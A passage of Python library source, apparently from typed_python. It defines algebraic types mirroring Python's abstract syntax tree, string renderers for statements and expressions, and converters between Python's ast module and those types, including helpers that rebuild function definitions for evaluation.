TupleOf(Statement)}\n))\n\nTypeIgnore = TypeIgnore.define(Alternative(\n \"TypeIgnore\",\n Item={'lineno': int, 'tag': str}\n))\n\n\ndef statementStrLines(self):\n if self.matches.FunctionDef:\n yield f\"def {self.name}(...):\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n return\n\n elif self.matches.Expr:\n yield str(self.value)\n\n elif self.matches.If:\n yield f\"if {self.test}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.While:\n yield f\"while {self.test}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.Try:\n yield \"try:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n for eh in self.handlers:\n yield f\"except {eh.type}\" + (f\" as {eh.name}\")\n for s in eh.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.finalbody:\n yield \"finally:\"\n for s in self.finalbody:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.With:\n yield f\"with {self.items}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.Assign:\n yield f\"{', '.join(str(x) for x in self.targets)} = {self.value}\"\n\n elif self.matches.AugAssign:\n yield f\"{self.target} {self.op}= {self.value}\"\n\n elif self.matches.Raise:\n res = \"raise\"\n if self.exc is not None:\n res += \" \" + str(self.exc)\n\n if self.cause is not None:\n res += \" from \" + str(self.cause)\n\n yield res\n\n elif self.matches.Break:\n yield \"break\"\n\n elif self.matches.Continue:\n yield \"continue\"\n\n elif self.matches.Pass:\n yield \"pass\"\n\n elif self.matches.Return:\n if self.value is not None:\n yield f\"return {self.value}\"\n else:\n yield \"return\"\n else:\n yield str(type(self)) + \"...\"\n\n\ndef StatementStr(self):\n return \"\\n\".join(list(statementStrLines(self)))\n\n\nStatement = Statement.define(Alternative(\n \"Statement\",\n FunctionDef={\n \"name\": str,\n \"args\": Arguments,\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n \"returns\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ClassDef={\n \"name\": str,\n \"bases\": TupleOf(Expr),\n \"keywords\": TupleOf(Keyword),\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Return={\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Delete={\n \"targets\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Assign={\n \"targets\": TupleOf(Expr),\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AugAssign={\n \"target\": Expr,\n \"op\": BinaryOp,\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Print={\n \"expr\": OneOf(Expr, None),\n \"values\": TupleOf(Expr),\n \"nl\": int,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n For={\n \"target\": Expr,\n \"iter\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n While={\n \"test\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n If={\n \"test\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n With={\n \"items\": TupleOf(WithItem),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Raise={\n \"exc\": OneOf(Expr, None),\n \"cause\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Try={\n \"body\": TupleOf(Statement),\n \"handlers\": TupleOf(ExceptionHandler),\n \"orelse\": TupleOf(Statement),\n \"finalbody\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Assert={\n \"test\": Expr,\n \"msg\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Import={\n \"names\": TupleOf(Alias),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ImportFrom={\n \"module\": OneOf(str, TupleOf(str)),\n \"names\": OneOf(Alias, TupleOf(Alias)),\n \"level\": OneOf(int, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Global={\n \"names\": TupleOf(str),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Expr={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Pass={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Break={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Continue={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncFunctionDef={\n \"name\": str,\n \"args\": Arguments,\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n \"returns\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AnnAssign={\n \"target\": Expr,\n \"annotation\": Expr,\n 'simple': int,\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncWith={\n \"items\": TupleOf(WithItem),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncFor={\n 'target': Expr,\n 'iter': Expr,\n 'body': TupleOf(Statement),\n 'orelse': TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n NonLocal={\n \"names\": TupleOf(str),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n __str__=StatementStr\n))\n\n\ndef ExpressionStr(self):\n if self.matches.ListComp:\n res = \"[\" + str(self.elt)\n for gen in self.generators:\n res += \" for \" + str(gen.target) + \" in \" + str(gen.iter)\n for ifS in gen.ifs:\n res += \" if \" + str(ifS)\n return res + \"]\"\n\n if self.matches.Lambda:\n return \"(lambda ...: \" + str(self.body) + \")\"\n\n if self.matches.Subscript:\n return str(self.value) + \"[\" + str(self.slice) + \"]\"\n\n if self.matches.Num:\n return str(self.n)\n\n if self.matches.Call:\n return (\n f\"({self.func})(\" +\n \", \".join([str(x) for x in self.args] + [f\"{kwd.arg}={kwd.value}\" for kwd in self.keywords])\n + \")\"\n )\n\n if self.matches.Str:\n return repr(self.s)\n\n if self.matches.Compare:\n res = str(self.left)\n for i in range(len(self.ops)):\n if self.ops[i].matches.Eq:\n sep = \"==\"\n if self.ops[i].matches.NotEq:\n sep = \"!=\"\n if self.ops[i].matches.Lt:\n sep = \"<\"\n if self.ops[i].matches.LtE:\n sep = \"<=\"\n if self.ops[i].matches.Gt:\n sep = \">\"\n if self.ops[i].matches.GtE:\n sep = \">=\"\n if self.ops[i].matches.Is:\n sep = \"is\"\n if self.ops[i].matches.IsNot:\n sep = \"is not\"\n if self.ops[i].matches.In:\n sep = \"in\"\n if self.ops[i].matches.NotIn:\n sep = \"not in\"\n\n res += f\" {sep} {self.comparators[i]}\"\n return res\n\n if self.matches.BoolOp:\n sep = \" and \" if self.op.matches.And else \" or \"\n return sep.join([f\"({x})\" for x in self.values])\n\n if self.matches.BinOp:\n if self.op.matches.Add:\n sep = \"+\"\n if self.op.matches.Sub:\n sep = \"-\"\n if self.op.matches.Mult:\n sep = \"*\"\n if self.op.matches.Div:\n sep = \"/\"\n if self.op.matches.Mod:\n sep = \"%\"\n if self.op.matches.Pow:\n sep = \"**\"\n if self.op.matches.LShift:\n sep = \"<<\"\n if self.op.matches.RShift:\n sep = \">>\"\n if self.op.matches.BitOr:\n sep = \"|\"\n if self.op.matches.BitXor:\n sep = \"^\"\n if self.op.matches.BitAnd:\n sep = \"&\"\n if self.op.matches.FloorDiv:\n sep = \"//\"\n if self.op.matches.MatMult:\n sep = \"@\"\n\n return f\"({self.left}) {sep} ({self.right})\"\n\n if self.matches.UnaryOp:\n if self.op.matches.Invert:\n sep = \"~\"\n if self.op.matches.Not:\n sep = \"not \"\n if self.op.matches.UAdd:\n sep = \"+\"\n if self.op.matches.USub:\n sep = \"-\"\n\n return f\"{sep} ({self.operand})\"\n\n if self.matches.Attribute:\n return f\"({self.value}).{self.attr}\"\n\n if self.matches.Yield:\n if self.value is None:\n return \"yield\"\n else:\n return f\"yield {self.value}\"\n\n if self.matches.Name:\n return self.id\n\n return str(type(self))\n\n\nExpr = Expr.define(Alternative(\n \"Expr\",\n BoolOp={\n \"op\": BooleanOp,\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n BinOp={\n \"left\": Expr,\n \"op\": BinaryOp,\n \"right\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n UnaryOp={\n \"op\": UnaryOp,\n \"operand\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Lambda={\n \"args\": Arguments,\n \"body\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n IfExp={\n \"test\": Expr,\n \"body\": Expr,\n \"orelse\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Dict={\n \"keys\": TupleOf(OneOf(None, Expr)),\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Set={\n \"elts\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ListComp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n SetComp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n DictComp={\n \"key\": Expr,\n \"value\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n GeneratorExp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Yield={\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Compare={\n \"left\": Expr,\n \"ops\": TupleOf(ComparisonOp),\n \"comparators\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Call={\n \"func\": Expr,\n \"args\": TupleOf(Expr),\n \"keywords\": TupleOf(Keyword),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Num={\n \"n\": NumericConstant,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Str={\n \"s\": str,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Attribute={\n \"value\": Expr,\n \"attr\": str,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Subscript={\n \"value\": Expr,\n \"slice\": Expr,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Name={\n \"id\": str,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n List={\n \"elts\": TupleOf(Expr),\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Tuple={\n \"elts\": TupleOf(Expr),\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Starred={\n \"value\": Expr,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n YieldFrom={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Await={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n JoinedStr={\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Bytes={\n 's': bytes,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Constant={\n 'value': OneOf(object, None),\n **({'kind': OneOf(None, str)} if sys.version_info.minor >= 8 else {}),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n FormattedValue={\n \"value\": Expr,\n \"conversion\": OneOf(int, None),\n \"format_spec\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Slice={\n \"lower\": OneOf(Expr, None),\n \"upper\": OneOf(Expr, None),\n \"step\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n __str__=ExpressionStr\n))\n\nNumericConstant = NumericConstant.define(Alternative(\n \"NumericConstant\",\n Int={\"value\": int},\n Long={\"value\": str},\n Boolean={\"value\": bool},\n None_={},\n Float={\"value\": float},\n Complex={\"real\": float, \"imag\": float},\n Unknown={},\n __str__=lambda self: (\n str(self.value) if (\n self.matches.Int or self.matches.Long\n or self.matches.Boolean or self.matches.Float\n ) else \"None\" if self.matches.None_ else\n f\"{self.real} + {self.imag}j\" if self.matches.Complex else \"Unknown\"\n )\n))\n\nExprContext = ExprContext.define(Alternative(\n \"ExprContext\",\n Load={},\n Store={},\n Del={},\n AugLoad={},\n AugStore={},\n Param={}\n))\n\nBooleanOp = BooleanOp.define(Alternative(\n \"BooleanOp\",\n And={},\n Or={}\n))\n\nBinaryOp = BinaryOp.define(Alternative(\n \"BinaryOp\",\n Add={},\n Sub={},\n Mult={},\n Div={},\n Mod={},\n Pow={},\n LShift={},\n RShift={},\n BitOr={},\n BitXor={},\n BitAnd={},\n FloorDiv={},\n MatMult={}\n))\n\nUnaryOp = UnaryOp.define(Alternative(\n \"UnaryOp\",\n Invert={},\n Not={},\n UAdd={},\n USub={}\n))\n\nComparisonOp = ComparisonOp.define(Alternative(\n \"ComparisonOp\",\n Eq={},\n NotEq={},\n Lt={},\n LtE={},\n Gt={},\n GtE={},\n Is={},\n IsNot={},\n In={},\n NotIn={}\n))\n\nComprehension = Comprehension.define(Alternative(\n \"Comprehension\",\n Item={\n \"target\": Expr,\n \"iter\": Expr,\n \"ifs\": TupleOf(Expr),\n \"is_async\": bool\n }\n))\n\nExceptionHandler = ExceptionHandler.define(Alternative(\n \"ExceptionHandler\",\n Item={\n \"type\": OneOf(Expr, None),\n \"name\": OneOf(str, None),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n }\n))\n\nArguments = Arguments.define(Alternative(\n \"Arguments\",\n Item={\n **({'posonlyargs': TupleOf(Arg)} if sys.version_info.minor >= 8 else {}),\n \"args\": TupleOf(Arg),\n \"vararg\": OneOf(Arg, None),\n \"kwonlyargs\": TupleOf(Arg),\n \"kw_defaults\": TupleOf(OneOf(None, Expr)),\n \"kwarg\": OneOf(Arg, None),\n \"defaults\": TupleOf(Expr),\n },\n totalArgCount=lambda self:\n len(self.args)\n + (1 if self.vararg else 0)\n + (1 if self.kwarg else 0)\n + len(self.kwonlyargs),\n argumentNames=lambda self:\n [a.arg for a in self.args]\n + ([self.vararg.arg] if self.vararg else [])\n + [a.arg for a in self.kwonlyargs]\n + ([self.kwarg.arg] if self.kwarg else [])\n))\n\nArg = Arg.define(Alternative(\n \"Arg\",\n Item={\n 'arg': str,\n 'annotation': OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n }\n))\n\nKeyword = Keyword.define(Alternative(\n \"Keyword\",\n Item={\n \"arg\": OneOf(None, str),\n \"value\": Expr,\n **({'line_number': int, 'col_offset': int, 'filename': str} if sys.version_info.minor >= 9 else {})\n }\n))\n\nAlias = Alias.define(Alternative(\n \"Alias\",\n Item={\n \"name\": str,\n \"asname\": OneOf(str, None),\n **({\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n } if sys.version_info.minor >= 10 else {})\n }\n))\n\nWithItem = WithItem.define(Alternative(\n \"WithItem\",\n Item={\n \"context_expr\": Expr,\n \"optional_vars\": OneOf(Expr, None),\n }\n))\n\nnumericConverters = {\n int: lambda x: NumericConstant.Int(value=x),\n bool: lambda x: NumericConstant.Boolean(value=x),\n type(None): lambda x: NumericConstant.None_(),\n float: lambda x: NumericConstant.Float(value=x),\n complex: lambda x: NumericConstant.Complex(real=x.real, imag=x.imag)\n}\n\n\ndef createPythonAstConstant(n, **kwds):\n if type(n) not in numericConverters:\n return Expr.Num(\n n=NumericConstant.Unknown(),\n **kwds\n )\n return Expr.Num(\n n=numericConverters[type(n)](n),\n **kwds\n )\n\n\ndef createPythonAstString(s, **kwds):\n try:\n return Expr.Str(s=str(s), **kwds)\n except Exception:\n return Expr.Num(\n n=NumericConstant.Unknown(),\n **kwds\n )\n\n\ndef makeNameConstant(value, **kwds):\n return Expr.Num(n=numericConverters[type(value)](value), **kwds)\n\n\ndef makeEllipsis(*args):\n return Expr.Constant(value=...)\n\n\ndef makeExtSlice(dims):\n return Expr.Tuple(elts=dims)\n\n\n# map Python AST types to our syntax-tree types (defined `ove)\nconverters = {\n ast.Module: Module.Module,\n ast.Expression: Module.Expression,\n ast.Interactive: Module.Interactive,\n ast.Suite: Module.Suite,\n ast.FunctionDef: Statement.FunctionDef,\n ast.ClassDef: Statement.ClassDef,\n ast.Return: Statement.Return,\n ast.Delete: Statement.Delete,\n ast.Assign: Statement.Assign,\n ast.AugAssign: Statement.AugAssign,\n ast.AnnAssign: Statement.AnnAssign,\n ast.For: Statement.For,\n ast.While: Statement.While,\n ast.If: Statement.If,\n ast.With: Statement.With,\n ast.Raise: Statement.Raise,\n ast.Try: Statement.Try,\n ast.Assert: Statement.Assert,\n ast.Import: Statement.Import,\n ast.ImportFrom: Statement.ImportFrom,\n ast.Global: Statement.Global,\n ast.Nonlocal: Statement.NonLocal,\n ast.Expr: Statement.Expr,\n ast.Pass: Statement.Pass,\n ast.Break: Statement.Break,\n ast.Continue: Statement.Continue,\n ast.BoolOp: Expr.BoolOp,\n ast.BinOp: Expr.BinOp,\n ast.UnaryOp: Expr.UnaryOp,\n ast.Lambda: Expr.Lambda,\n ast.IfExp: Expr.IfExp,\n ast.Dict: Expr.Dict,\n ast.Set: Expr.Set,\n ast.JoinedStr: Expr.JoinedStr,\n ast.Bytes: Expr.Bytes,\n ast.Constant: Expr.Constant,\n ast.FormattedValue: Expr.FormattedValue,\n ast.ListComp: Expr.ListComp,\n ast.AsyncFunctionDef: Statement.AsyncFunctionDef,\n ast.AsyncWith: Statement.AsyncWith,\n ast.AsyncFor: Statement.AsyncFor,\n ast.Await: Expr.Await,\n ast.SetComp: Expr.SetComp,\n ast.DictComp: Expr.DictComp,\n ast.GeneratorExp: Expr.GeneratorExp,\n ast.Yield: Expr.Yield,\n ast.YieldFrom: Expr.YieldFrom,\n ast.Compare: Expr.Compare,\n ast.Call: Expr.Call,\n ast.Num: createPythonAstConstant,\n ast.Str: createPythonAstString,\n ast.Attribute: Expr.Attribute,\n ast.Subscript: Expr.Subscript,\n ast.Name: Expr.Name,\n ast.NameConstant: makeNameConstant,\n ast.List: Expr.List,\n ast.Tuple: Expr.Tuple,\n ast.Starred: Expr.Starred,\n ast.Load: ExprContext.Load,\n ast.Store: ExprContext.Store,\n ast.Del: ExprContext.Del,\n ast.AugLoad: ExprContext.AugLoad,\n ast.AugStore: ExprContext.AugStore,\n ast.Param: ExprContext.Param,\n ast.Ellipsis: makeEllipsis,\n ast.Slice: Expr.Slice,\n ast.ExtSlice: makeExtSlice,\n ast.Index: lambda value: value,\n ast.And: BooleanOp.And,\n ast.Or: BooleanOp.Or,\n ast.Add: BinaryOp.Add,\n ast.Sub: BinaryOp.Sub,\n ast.Mult: BinaryOp.Mult,\n ast.MatMult: BinaryOp.MatMult,\n ast.Div: BinaryOp.Div,\n ast.Mod: BinaryOp.Mod,\n ast.Pow: BinaryOp.Pow,\n ast.LShift: BinaryOp.LShift,\n ast.RShift: BinaryOp.RShift,\n ast.BitOr: BinaryOp.BitOr,\n ast.BitXor: BinaryOp.BitXor,\n ast.BitAnd: BinaryOp.BitAnd,\n ast.FloorDiv: BinaryOp.FloorDiv,\n ast.Invert: UnaryOp.Invert,\n ast.Not: UnaryOp.Not,\n ast.UAdd: UnaryOp.UAdd,\n ast.USub: UnaryOp.USub,\n ast.Eq: ComparisonOp.Eq,\n ast.NotEq: ComparisonOp.NotEq,\n ast.Lt: ComparisonOp.Lt,\n ast.LtE: ComparisonOp.LtE,\n ast.Gt: ComparisonOp.Gt,\n ast.GtE: ComparisonOp.GtE,\n ast.Is: ComparisonOp.Is,\n ast.IsNot: ComparisonOp.IsNot,\n ast.In: ComparisonOp.In,\n ast.NotIn: ComparisonOp.NotIn,\n ast.comprehension: Comprehension.Item,\n ast.excepthandler: lambda x: x,\n ast.ExceptHandler: ExceptionHandler.Item,\n ast.arguments: Arguments.Item,\n ast.arg: Arg.Item,\n ast.keyword: Keyword.Item,\n ast.alias: Alias.Item,\n ast.withitem: WithItem.Item,\n **({'ast.type_ignore': TypeIgnore.Item} if sys.version_info.minor >= 8 else {}),\n}\n\n# most converters map to an alternative type\nreverseConverters = {\n t: v for v, t in converters.items()\n if hasattr(t, '__typed_python_category__') and t.__typed_python_category__ == \"ConcreteAlternative\"\n}\n\n\ndef convertAlgebraicArgs(pyAst, *members):\n members = [x for x in members if x not in ['line_number', 'col_offset']]\n return {m: convertAlgebraicToPyAst(getattr(pyAst, m)) for m in members}\n\n\ndef convertAlgebraicToPyAst(pyAst):\n res = convertAlgebraicToPyAst_(pyAst)\n\n if hasattr(pyAst, \"line_number\"):\n res.lineno = pyAst.line_number\n res.col_offset = pyAst.col_offset\n\n return res\n\n\ndef convertAlgebraicToSlice(pyAst):\n if sys.version_info.minor >= 9:\n return convertAlgebraicToPyAst(pyAst)\n else:\n if pyAst.matches.Slice:\n args = {}\n\n if pyAst.lower is not None:\n args['lower'] = convertAlgebraicToPyAst(pyAst.lower)\n\n if pyAst.upper is not None:\n args['upper'] = convertAlgebraicToPyAst(pyAst.upper)\n\n if pyAst.step is not None:\n args['step'] = convertAlgebraicToPyAst(pyAst.step)\n\n return ast.Slice(**args)\n\n if pyAst.matches.Tuple:\n return ast.ExtSlice(dims=[convertAlgebraicToPyAst(x) for x in pyAst.elts])\n\n return ast.Index(convertAlgebraicToPyAst(pyAst))\n\n\ndef convertAlgebraicToPyAst_(pyAst):\n if pyAst is None:\n return None\n\n if isinstance(pyAst, (str, int, float, bool, bytes)):\n return pyAst\n\n if hasattr(pyAst, \"__typed_python_category__\") and pyAst.__typed_python_category__ == \"TupleOf\":\n return [convertAlgebraicToPyAst(x) for x in pyAst]\n\n if type(pyAst) is Expr.Str:\n return ast.Str(s=pyAst.s)\n\n if type(pyAst) is Expr.Num:\n if pyAst.n.matches.Boolean:\n return ast.NameConstant(value=True if pyAst.n.value else False)\n if pyAst.n.matches.None_:\n return ast.NameConstant(value=None)\n if pyAst.n.matches.Complex:\n return ast.Num(n=complex(pyAst.n.real, pyAst.n.imag))\n if pyAst.n.matches.Unknown:\n raise Exception(f\"Unknown constant: {pyAst.filename}:{pyAst.line_number}\")\n return ast.Num(n=pyAst.n.value)\n\n if type(pyAst) is Expr.Subscript:\n res = ast.Subscript(\n value=convertAlgebraicToPyAst(pyAst.value),\n slice=convertAlgebraicToSlice(pyAst.slice),\n ctx=convertAlgebraicToPyAst(pyAst.ctx),\n )\n\n res.lineno = pyAst.line_number\n res.col_offset = pyAst.col_offset\n\n return res\n\n if type(pyAst) is Expr.Constant:\n return reverseConverters[type(pyAst)](\n **{k: getattr(pyAst, k) for k in type(pyAst).ElementType.ElementNames if k not in ['line_number', 'col_offset']}\n )\n\n if type(pyAst) in reverseConverters:\n return reverseConverters[type(pyAst)](**convertAlgebraicArgs(pyAst, *type(pyAst).ElementType.ElementNames))\n\n assert False, type(pyAst)\n\n\ndef convertPyAstToAlgebraic(tree, fname, keepLineInformation=True):\n if issubclass(type(tree), ast.AST):\n converter = converters[type(tree)]\n args = {}\n\n for f in tree._fields:\n # type_comment was introduced in 3.8, but we don't need it\n if f != \"type_comment\":\n if hasattr(tree, f):\n args[f] = convertPyAstToAlgebraic(getattr(tree, f), fname, keepLineInformation)\n else:\n args[f] = None\n\n try:\n if keepLineInformation:\n args['line_number'] = tree.lineno\n args['col_offset'] = tree.col_offset\n args['filename'] = fname\n else:\n args['line_number'] = 0\n args['col_offset'] = 0\n args['filename'] = ''\n except AttributeError:\n pass\n\n try:\n # 'type_comment' is introduced in 3.8, but we don't need it\n # and don't do anything with it, and it's just a comment so it doesn't\n # affect execution semantics.\n if 'type_comment' in args:\n args.pop('type_comment')\n\n return converter(**args)\n except Exception:\n if 'line_number' in args:\n del args['line_number']\n del args['col_offset']\n del args['filename']\n\n try:\n return converter(**args)\n except Exception:\n raise UserWarning(\n \"Failed to construct %s from %s with arguments\\n%s\\n\\n%s\" % (\n converter,\n type(tree),\n \"\\n\".join([\n \"\\t%s:%s (from %s)\" % (\n k, repr(v)[:50], getattr(tree, k) if hasattr(tree, k) else None\n )\n for k, v in args.items()\n ]),\n traceback.format_exc()\n )\n )\n\n if isinstance(tree, list):\n return [convertPyAstToAlgebraic(x, fname, keepLineInformation) for x in tree]\n\n return tree\n\n\ndef stripDecoratorFromFuncDef(ast):\n \"\"\"Strip any decorator_list elements from a Statement.FunctionDef.\n\n Args:\n ast - a Statement.FunctionDef or an Expr.Lambda\n\n Returns:\n same type as ast but without any decorator_list elements.\n \"\"\"\n if not ast.matches.FunctionDef:\n return ast\n\n return Statement.FunctionDef(\n name=ast.name,\n args=ast.args,\n body=ast.body,\n decorator_list=(), # strip decorators here\n returns=ast.returns,\n line_number=ast.line_number,\n col_offset=ast.col_offset,\n filename=ast.filename,\n )\n\n\n# a map from (code) -> algebraic ast\n_codeToAlgebraicAst = {}\n_codeToAlgebraicAstWithoutLineInfo = {}\n\n\ndef convertFunctionToAlgebraicPyAst(f, keepLineInformation=True):\n # we really just care about the code itself\n if isinstance(f, types.FunctionType):\n fCode = f.__code__\n elif isinstance(f, types.CodeType):\n fCode = f\n else:\n raise Exception(\n \"convertFunctionToAlgebraicPyAst requires a function object, or a code object.\"\n )\n\n if not keepLineInformation:\n if fCode in _codeToAlgebraicAstWithoutLineInfo:\n return _codeToAlgebraicAstWithoutLineInfo[fCode]\n\n algebraic = convertFunctionToAlgebraicPyAst(f)\n\n _codeToAlgebraicAstWithoutLineInfo[fCode] = convertPyAstToAlgebraic(\n convertAlgebraicToPyAst(algebraic),\n \"\",\n False\n )\n\n return _codeToAlgebraicAstWithoutLineInfo[fCode]\n\n # check if this is in the cache already\n if fCode in _codeToAlgebraicAst:\n return _codeToAlgebraicAst[fCode]\n\n # it's not. we'll have to build it\n try:\n pyast = python_ast_util.pyAstForCode(fCode)\n except Exception:\n raise Exception(\"Failed to get source for function %s:\\n%s\" % (fCode.co_name, traceback.format_exc()))\n\n try:\n algebraicAst = convertPyAstToAlgebraic(pyast, fCode.co_filename, True)\n\n # strip any decorators from the function def. They are not actually part of the\n # definition of the code object itself\n algebraicAst = stripDecoratorFromFuncDef(algebraicAst)\n\n cacheAstForCode(fCode, algebraicAst)\n except Exception as e:\n raise Exception(\n \"Failed to convert function at %s:%s:\\n%s\"\n % (fCode.co_filename, fCode.co_firstlineno, repr(e))\n )\n\n return _codeToAlgebraicAst[fCode]\n\n\n# a memo from pyAst to the 'code' object that we evaluate to def it.\n# this is only relevant for the versions that do have line numbers\n_pyAstToCodeObjectCache = {}\n\n\ndef stripAstArgAnnotations(arg: Arg):\n return Arg.Item(\n arg=arg.arg,\n annotation=None,\n line_number=arg.line_number,\n col_offset=arg.col_offset,\n filename=arg.filename\n )\n\n\ndef stripAstArgsAnnotations(args: Arguments):\n return Arguments.Item(\n args=[stripAstArgAnnotations(x) for x in args.args],\n vararg=stripAstArgAnnotations(args.vararg) if args.vararg is not None else None,\n kwonlyargs=[stripAstArgAnnotations(x) for x in args.kwonlyargs],\n kw_defaults=args.kw_defaults,\n kwarg=stripAstArgAnnotations(args.kwarg) if args.kwarg is not None else None,\n defaults=(),\n )\n\n\ndef evaluateFunctionPyAst(pyAst, globals=None, stripAnnotations=False):\n assert isinstance(pyAst, (Expr.Lambda, Statement.FunctionDef, Statement.AsyncFunctionDef))\n\n filename = pyAst.filename\n\n if isinstance(pyAst, Statement.FunctionDef):\n # strip out the decorator definitions. We just want the underlying function\n # object itself.\n pyAstModule = Statement.FunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n pyAstModule = Module.Module(body=(pyAstModule,))\n elif isinstance(pyAst, Statement.AsyncFunctionDef):\n # strip out the decorator definitions. We just want the underlying function\n # object itself.\n pyAstModule = Statement.AsyncFunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n pyAstModule = Module.Module(body=(pyAstModule,))\n elif isinstance(pyAst, Expr):\n pyAstModule = Module.Expression(body=pyAst)\n\n globals = dict(globals) if globals is not None else 